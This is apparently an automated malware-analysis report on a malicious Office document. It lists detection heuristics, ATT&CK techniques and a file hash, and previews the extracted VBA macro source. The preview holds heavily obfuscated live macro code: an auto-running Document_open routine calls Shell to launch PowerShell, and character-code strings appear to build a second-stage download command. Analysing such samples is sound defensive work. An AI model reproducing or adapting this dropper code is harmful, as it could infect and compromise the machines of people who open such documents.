MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms that the Document_open auto-execution macro is used to execute code via Shell(). The VBA script attempts to construct and execute a command that includes the string 'powershell'. This suggests the macro's purpose is to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Malware.0053456c-6874533-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.0053456c-6874533-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15046 bytes |
SHA-256: 8948e9b18450444e44b9606de920d264bca15539da49a262fc95a9bb5ae69ef2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PzjIiOB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function TZCIdAw() On Error Resume Next SfjGZX = UOpGlk XQvuG = CDbl(GNYLXF * CDbl(HsnlRl + Int(KLBVCn * Rnd(20892)) * twIwvY * Log(84673 * DtTQi - HYjTm + Fix(51)))) PSwoZ = Tan(25758) PZrSl = CDbl(TZDaKM) bbDpzB = Tan(81965) rkszU = FDcmj hfldCA = HmhVIJ OjrLs = CDbl(AlImmI * CDbl(EVAik + Int(PfkFGp * Rnd(93789)) * tTVHia * Log(52821 * VbjaR - wXzrtj + Fix(51)))) jFSvS = Tan(94235) ikVvqH = CDbl(mfIhq) mlDkit = Tan(89071) AYvKLV = MGOwNO rqNfbn = kTjMto MIaTYL = CDbl(XVZhb * CDbl(kUJIB + Int(zIihf * Rnd(69771)) * DcmfjU * Log(50635 * UJvjI - XTUnz + Fix(51)))) hSWzj = Tan(63750) qdiavi = CDbl(HolqpN) muPKa = Tan(21227) fPLNc = napNuh rqjAzR = iiizk HfEzzS = CDbl(PnRfNw * CDbl(wbJkRd + Int(nYcNf * Rnd(52509)) * sGizz * Log(71415 * iJiHGn - DZDmw + Fix(51)))) vJNbFY = Tan(69830) TGbkSq = CDbl(XhiiQ) PHZuj = Tan(13348) GURfc = pzkzZ TZCIdAw = CqntZqG + VBA.Shell(umWjdEMR + Chr(jtkDLbNCHY + vbKeyP + MqtHU) + "owers" + bfwBVn + vjtlJt + NQBDOBshP + iAuhGq + jbSQi + RimhZQkQff + kmsJfAIiw, 61365 - 61365) DVXhtp = QwWqU lPvpt = CDbl(VRkiG * CDbl(JlmMm + Int(uRZKlw * Rnd(69939)) * nuYANJ * Log(9358 * voOvn - vZTmR + Fix(51)))) jEKlho = Tan(32767) wbdwF = CDbl(ibtjU) kDiEJW = Tan(91650) zEqzzq = YWAqz CHUKQ = frTfjR hfMjG = CDbl(LXjwk * CDbl(TzHvLZ + Int(djvzWm * Rnd(64447)) * jjCUG * Log(65877 * YVWjN - jqWLk + Fix(51)))) FAjQUr = Tan(82913) lliquZ = CDbl(iqdcd) wqXwIG = Tan(83920) IbmYbL = zsZlm End Function Private Sub Document_open() On Error Resume Next uamnf = oFBzsj koPlX = CDbl(uXpsLw * CDbl(poJVG + Int(ONBioz * Rnd(85875)) * XOwtjC * Log(60782 * wtXMO - rFhaq + Fix(51)))) kJJju = Tan(26624) iGblfs = CDbl(Itzft) zzwjsK = Tan(40168) TsPzu = vVwAN hmmpS = jVwjLi zDjHhi = CDbl(qZWmGO * CDbl(OFzqiz + Int(LlhCz * Rnd(21927)) * wwmlS * Log(33447 * NHQlj - jIPAj + Fix(51)))) QnXSP = Tan(443) mlRwFj = CDbl(jrakB) ISQwt = Tan(63921) zRAziE = wcDVjS TZCIdAw awIKBJ = phfwv qRSOo = CDbl(mKhvSm * CDbl(UoIYqz + Int(SrEpX * Rnd(7116)) * imWqiX * Log(75750 * dQnFT - TsBqYL + Fix(51)))) CviCtD = Tan(67115) NdqkvH = CDbl(LEjPC) djIoBq = Tan(76156) Krkld = zwDwz MQnzUY = vhwGJI TpXCXh = CDbl(AKiqrv * CDbl(RzDCi + Int(wuEmR * Rnd(10244)) * DQGrq * Log(69701 * hQqwJ - LLFIHc + Fix(51)))) zAGNBh = Tan(63183) YkklSO = CDbl(jDnAHb) iiksEa = Tan(10276) AHEtj = kpwfod End Sub Attribute VB_Name = "YjOnPikJjFMq" Function bfwBVn() On Error Resume Next uzrHS = PnkrDV LwiaZA = zYiAzh UihTok = Tan(35984) rvjGql = Tan(35456) bfCiG = CDbl(skiAt) jFXzMT = CDbl(ijMbV * CDbl(MSqLL + Int(OMHZU * Rnd(29014)) * GiwBM * Log(64224 * NMajtZ - acPWzE + Fix(51)))) MuYbK = "HeLL ([chAr[]]" + "( 15 ,94 , 111" + " ,94 ,79" + " , 95 , 11" udJjd = GUthN iwkujK = mhrlW naLoXo = Tan(88792) NmzQi = Tan(45807) nAGqz = CDbl(jrYodv) jwUna = CDbl(CUijk * CDbl(hXsasT + Int(cwszOw * Rnd(51278)) * SdFsG * Log(63188 * dORMq - VczPAS + Fix(51)))) IjkJoXqVlkI = ",22, 11 ," + "69 , 78 , 92" + ", 6,68 ," + "73, 65, 78, 7" + "2 , 95,11" + " ," + "89,74, 69 " + ", " + "79 , 68," fzwIz = VKqKUj HpOKWq = mkbbWW uLTHK = Tan(25898) bUsSRU = Tan(33538) ojDzI = CDbl(TEcMC) swBIua = CDbl(ouTsLY * CDbl(rZHTM + Int(KEPwK * Rnd(73639)) * UjSGqI * Log(86202 * vQIZqz - uvSKS + Fix(51)))) zthDlpno = "70 ,16 , 15 " + ", 1" + "20 ,10" + "2,104 , 90" + ",115 , 79 " + ", 11" + ", 22,1" + "1 ,69, 78 ,92 ," + " 6,68 " HvTKz = iSXBfD uUnONK = qfORi NdBljn = Tan(40804) TLZYw = Tan(98157) zbGRIf = CDbl(JZFmaG) GmRwD = CDbl(NoDhi * CDbl(Wzopu + Int(dNVJLK * Rnd(64528)) * ocfics * Log(73132 * tjtaU - lrrnJC + Fix(51)))) ulhcapwV = ",73,65 , 78" + " ,72 , 95,11 ,1" + "20, 82 ,8" + "8 ,95 , 78,7" + "0 , 5 , 101" + ", " + "78,95 , 5,124" inmIHF = SldqBb FmIMwz = RhXckJ GuNBl = Tan(41469) zdssEQ = Tan(42534) SABSwG = CDbl(oQSfO) FRYo ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.